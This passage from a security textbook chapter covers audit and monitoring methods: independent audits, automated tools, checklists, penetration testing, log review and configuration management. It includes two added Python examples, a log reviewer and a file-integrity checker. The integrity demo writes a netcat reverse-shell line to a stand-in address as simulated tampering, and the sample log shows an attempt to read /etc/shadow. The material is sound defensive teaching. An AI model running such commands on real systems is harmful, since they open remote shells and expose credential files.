7.12 Basic Audit Methods and Tools 221
Chapter 7
the auditor cringe, the auditor should remember that he or she is there to
provide guidance, in the form of reviews and recommendations for
improvement, to help the problem go away. Question everything, but be
nice about it.
7.12 Basic Audit Methods and Tools
Operational assurance is the process of reviewing an operational system to
see that security controls, both automated and manual, are functioning cor-
rectly and effectively [9]. To maintain operational assurance, organizations
use two basic methods: system audits and monitoring. These terms are used
loosely within the computer security community and often overlap. A sys-
tem audit is a periodic event used to evaluate security. An audit conducted
to support operational assurance examines whether the system is meeting
stated or implied security requirements, including system and organization
policies. Some audits will also examine whether security requirements are
appropriate for an organization, based on the risks identified in a risk analy-
sis process. Less formal audits are sometimes called security reviews.
Audits can be self-administered or performed by independent parties
(either internal or external to the organization). Both types of audit can pro-
vide an organization with excellent information about the technical, proce-
dural, managerial, and other related aspects of its security. The essential
difference between a self-audit and an independent audit is objectivity.
Reviews done by system management staff, often called self-audits or self-
assessments, have an inherent conflict of interest. The system management
staff may have little incentive to say the computer system was poorly designed
or is sloppily operated. On the other hand, they may be motivated by a strong
desire to improve the security of the system. In addition, they are knowledge-
able about the system and may be able to find hidden problems.
The independent auditor, by contrast, should have no professional stake
in the system. The independent auditor has nothing to gain from the out-
come (good or bad) of an audit. An independent audit should be per-
formed by a professional, reputable audit firm, and done in accordance
with generally accepted auditing standards. Many methods and tools, some
of which are described below, can be used to audit a system.
7.12.1 Automated Tools
Even for small multiuser computer systems, manually reviewing security
features is a big job. Automated tools make it feasible to review computer
systems, small or large, for a variety of security flaws. Generally, an auditor
uses two types of automated tools:
1. Active tools, which find vulnerabilities by trying to exploit them
2. Passive tools, which only examine the state of the system and infer the
existence of problems from it
Automated tools can be used to help find many threats and vulnerabili-
ties, such as improper access controls or weak access control configurations,
weak passwords, lack of integrity of the system software, or missing software
updates and patches. These tools are often very successful at finding vul-
nerabilities, and attackers use the same tools to break into systems, so an
administrator who does not use them is at a disadvantage. Systems adminis-
trators are encouraged to use automated tools as much as possible. Frequent
use of such tools allows for early detection and remediation of problems and
should be a part of the daily routine for an administrator.
Passive testing can assist an auditor in the review of controls put in place
in an IS organization and help determine whether they are effective or not.
The auditor will often need to analyze both the computer and noncom-
puter-based controls. Techniques used to accomplish this task include
inquiry, observation, and testing (of the controls and the data). The audit
can frequently detect illegal acts, errors, irregularities, or a lack of compli-
ance with laws and regulations. Security checklists and penetration testing,
discussed below, may also be used to assist in the audit.
7.12.2 Security Checklists
An organization's site security plan outlines the major security consider-
ations for a system, including management, operational, and technical
issues. One advantage of using a computer security plan is that it reflects
the unique security environment of the system, rather than a generic list of
controls. Checklists should be developed using the security plan as the
framework for the depth and breadth of the audit. Other checklists can also
be developed that include organizational security policies and practices.
Lists of "generally accepted security practices" obtained from outside
sources can also be used. When using standardized or best-practice check-
lists, it is important to remember that deviations from their prescribed
standards are not necessarily wrong; they may be appropriate for the
system's unique environment or technical constraints. Checklists can also
be used to verify that changes to a system have been reviewed from a
security perspective. A general audit should examine the system's
configuration to validate whether or not any major changes have occurred
that have not yet been analyzed from a security point of view.
7.12.3 Penetration Testing
Penetration testing is used to attempt a system break-in for the purpose of
discovering vulnerabilities in the protection controls in place at an organiza-
tion. Penetration testing often is done using automated tools, but it can also
be done manually. Security experts advocate penetration testing that mimics
methods that would be employed by a real hacker making intrusion
attempts against a system. For host systems on the Internet, this would cer-
tainly include automated tools. For many systems, poor security procedures
or a lack of internal controls on applications are common vulnerabilities
that penetration testing can target.
7.12.4 Monitoring Methods and Tools
Security monitoring should be an ongoing activity. Its purpose is to look for
vulnerabilities and security problems that may exist in the security controls
implemented by the organization. Many monitoring methods are similar to
those used for audits, but monitoring is performed on a more frequent
basis. In some instances, monitoring uses automated tools and is performed
in real time on a continual basis.
7.12.4.1 Review of System Logs
A periodic review of system-generated logs can detect security problems,
including attempts to exceed access authority or gain system access during
unusual hours. It is a good practice to have log-checking integrated into the
daily routine for systems administrators. An organization that operates a
systematic log-checking program has a much better chance of detecting
intrusions than one that reads its logs only after something has gone wrong.
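The two conditions named above, attempts to exceed access authority and access at unusual hours, are simple to check mechanically once the logs are parsed. The script below is an added illustration and is not the chapter's own code. It assumes a syslog-style line layout ("timestamp host program: message"), OpenSSH/sudo-style message wording, and business hours of 07:00 to 19:00 on weekdays; the log lines it runs over are constructed for the example, not captured from a real system.

```python
"""Periodic log review: flag sudo failures (attempts to exceed access
authority) and interactive logins at unusual hours.

Added example, not from the chapter.  Assumptions: syslog-style lines
"<ISO timestamp> <host> <program>[pid]: <message>", OpenSSH and sudo
message wording, business hours 07:00-19:00 Monday to Friday.
"""
import re
from datetime import datetime

# Constructed sample log; not real data.  2024-03-04 is a Monday, 03-09 a Saturday.
SAMPLE_LOG = """\
2024-03-04T09:12:01 web01 sshd[1201]: Accepted publickey for alice from 10.0.0.5 port 50122 ssh2
2024-03-04T09:15:44 web01 sudo: alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/systemctl restart nginx
2024-03-04T13:02:10 web01 sudo: bob : user NOT in sudoers ; TTY=pts/1 ; PWD=/home/bob ; USER=root ; COMMAND=/bin/cat /etc/shadow
2024-03-05T02:47:33 web01 sshd[1388]: Accepted password for bob from 203.0.113.9 port 40211 ssh2
2024-03-05T02:48:05 web01 sshd[1388]: pam_unix(sshd:session): session opened for user bob
2024-03-05T02:50:19 web01 sudo: bob : 3 incorrect password attempts ; TTY=pts/2 ; PWD=/home/bob ; USER=root ; COMMAND=/usr/bin/su -
2024-03-09T11:30:00 web01 sshd[1501]: Accepted publickey for carol from 10.0.0.7 port 50190 ssh2
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) (?P<prog>[\w\-]+)(?:\[\d+\])?: (?P<msg>.*)$")
LOGIN_RE = re.compile(r"Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<src>\S+)")
# sudo logs "<user> : <reason> ; TTY=..." only when something went wrong;
# a successful invocation has no reason field before TTY=.
SUDO_RE = re.compile(r"^(?P<user>\S+) : (?P<detail>.*?) ; TTY=")
SUDO_FAIL_MARKERS = ("NOT in sudoers", "incorrect password attempt", "command not allowed")

BUSINESS_START, BUSINESS_END = 7, 19   # assumed local business hours (exclusive end)


def parse_line(line):
    """Split one syslog-style line into its fields; None if it does not fit the layout."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    return rec


def is_unusual_hour(ts):
    """Weekend, or outside business hours on a weekday."""
    return ts.weekday() >= 5 or not (BUSINESS_START <= ts.hour < BUSINESS_END)


def review(log_text):
    """Return a list of (finding_type, user, timestamp, detail) tuples."""
    findings = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue          # unknown layout; in a real program count these, never drop silently
        ts, prog, msg = rec["ts"], rec["prog"], rec["msg"]
        if prog == "sshd":
            m = LOGIN_RE.search(msg)
            if m and is_unusual_hour(ts):
                findings.append(("unusual_hour_login", m["user"], ts.isoformat(), m["src"]))
        elif prog == "sudo":
            m = SUDO_RE.match(msg)
            if m and any(marker in m["detail"] for marker in SUDO_FAIL_MARKERS):
                findings.append(("exceed_authority", m["user"], ts.isoformat(), m["detail"]))
    return findings


if __name__ == "__main__":
    for finding in review(SAMPLE_LOG):
        print(*finding, sep="\t")
```

Run against the sample, the script flags bob's refused sudo, bob's 02:47 password login from an outside address and his subsequent failed su, and carol's Saturday login; alice's daytime key login and successful sudo are left alone. The same structure carries over to a real deployment by replacing the constructed text with the host's auth log and adjusting the hour window and message patterns to the local environment.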
7.12.4.2 Automated Monitoring Tools
Several types of automated tools can be used to monitor a system for secu-
rity problems. Some examples are shown in Figure 7.8.
7.12.5 Configuration Management
From a security point of view, configuration management provides assur-
ance that the system in operation is the correct version (configuration) of
the system, and that any changes to be made are reviewed for security
implications. Configuration management can be used to help ensure that
changes take place in an identifiable and controlled environment and that
they do not unintentionally harm any of the system's properties, including
its security. Some organizations, particularly those with very large systems,
use a configuration control board for configuration management. When
such a board exists, it is helpful to have a computer security expert partici-
pate. In any case, it is useful to have computer security managers participate
in system management decision making. Changes to the system can have
security implications because they may introduce or remove vulnerabilities
and because significant changes may require updating the contingency
plan, risk analysis, or accreditation.
Figure 7.8 Some automated tools used in the audit process.

Virus scanners, which are programs that test for the presence of
viruses in executable program files.

Checksumming, which works under the assumption that program
files should not change between updates. Checksumming is a pro-
cess whereby a mathematical value based on the contents of a par-
ticular file is generated. To verify the integrity of the file, the
checksum is generated on demand for that file and compared
with the previously generated value. If the two values are equal, the
integrity of the file is verified. For this check to hold against deliberate
tampering rather than only accidental corruption, the value should be
produced by a cryptographic hash function, and the stored baseline must
be kept where an intruder who can alter the files cannot also alter it.

Password crackers, tools that check passwords against a known list
of "bad or weak" passwords. Crackers can also check passwords
against common permutations of the user ID.

Intrusion detectors, programs that analyze a system audit trail, espe-
cially logons, connections, operating system calls, and various com-
mand parameters, for activity that could indicate unauthorized use.
Intrusion detection is covered in Chapter 6 of this book.

System performance monitoring, which analyzes system perfor-
mance logs in real time to look for availability problems, including
active attacks (such as the Slammer worm) and system and network
slowdowns and crashes.
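The checksumming item above, which is also the clearest instance of the passive tool class described in Section 7.12.1 (the tool only reads the system's state and infers a problem from it), is shown below as an added example; it is not the chapter's own code. It assumes SHA-256 as the "mathematical value" (the chapter names no particular function) and exercises the baseline-and-compare cycle against constructed files in a temporary directory, including the two cases a plain equal/not-equal check misses: a baselined file that has disappeared, and a file that is present but was never baselined.

```python
"""File integrity checking by baseline-and-compare, as in Figure 7.8.

Added example, not from the chapter.  Assumption: SHA-256 is used as the
checksum; a collision-resistant hash is what makes the comparison meaningful
against a deliberate substitution rather than only accidental corruption.
"""
import hashlib
import os
import tempfile


def file_digest(path, chunk_size=65536):
    """SHA-256 of a file, read in chunks so large binaries need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(paths):
    """Record the current digest of every file that is expected not to change."""
    return {p: file_digest(p) for p in paths}


def verify(baseline, current_paths):
    """Compare the present state of the files against the baseline.

    Returns lists of unchanged, modified, missing (baselined but gone) and
    unexpected (present but never baselined) paths.  The last two matter as
    much as a modified file: a deleted log-shipping binary or a planted
    helper script is an integrity event too.
    """
    result = {"unchanged": [], "modified": [], "missing": [], "unexpected": []}
    for path, expected in baseline.items():
        if not os.path.exists(path):
            result["missing"].append(path)
        elif file_digest(path) == expected:
            result["unchanged"].append(path)
        else:
            result["modified"].append(path)
    for path in current_paths:
        if path not in baseline:
            result["unexpected"].append(path)
    return result


def demo():
    """Self-contained run: constructed files, a baseline, then three kinds of change."""
    with tempfile.TemporaryDirectory() as d:
        paths = [os.path.join(d, name) for name in ("login", "ls", "passwd")]
        for p in paths:
            with open(p, "wb") as f:
                f.write(b"#!/bin/sh\necho original " + os.path.basename(p).encode() + b"\n")
        baseline = build_baseline(paths)

        # Simulate tampering, deletion and a planted file (all constructed).
        with open(paths[0], "ab") as f:
            f.write(b"nc -e /bin/sh 203.0.113.9 4444\n")
        os.remove(paths[1])
        with open(os.path.join(d, "sshd.bak"), "wb") as f:
            f.write(b"not baselined\n")

        now = sorted(os.path.join(d, n) for n in os.listdir(d))
        report = verify(baseline, now)
        # Report basenames so the temporary directory name does not leak into the output.
        return {k: [os.path.basename(p) for p in v] for k, v in report.items()}


if __name__ == "__main__":
    for kind, names in demo().items():
        print(f"{kind:10s} {', '.join(names) or '-'}")
```

In `demo()` the appended line turns `login` into a modified file, `ls` is reported missing, `passwd` is unchanged and `sshd.bak` is unexpected. In production the baseline dictionary would be written out after each legitimate update and stored on read-only or offline media, since an intruder who can rewrite the baseline alongside the files defeats the comparison entirely.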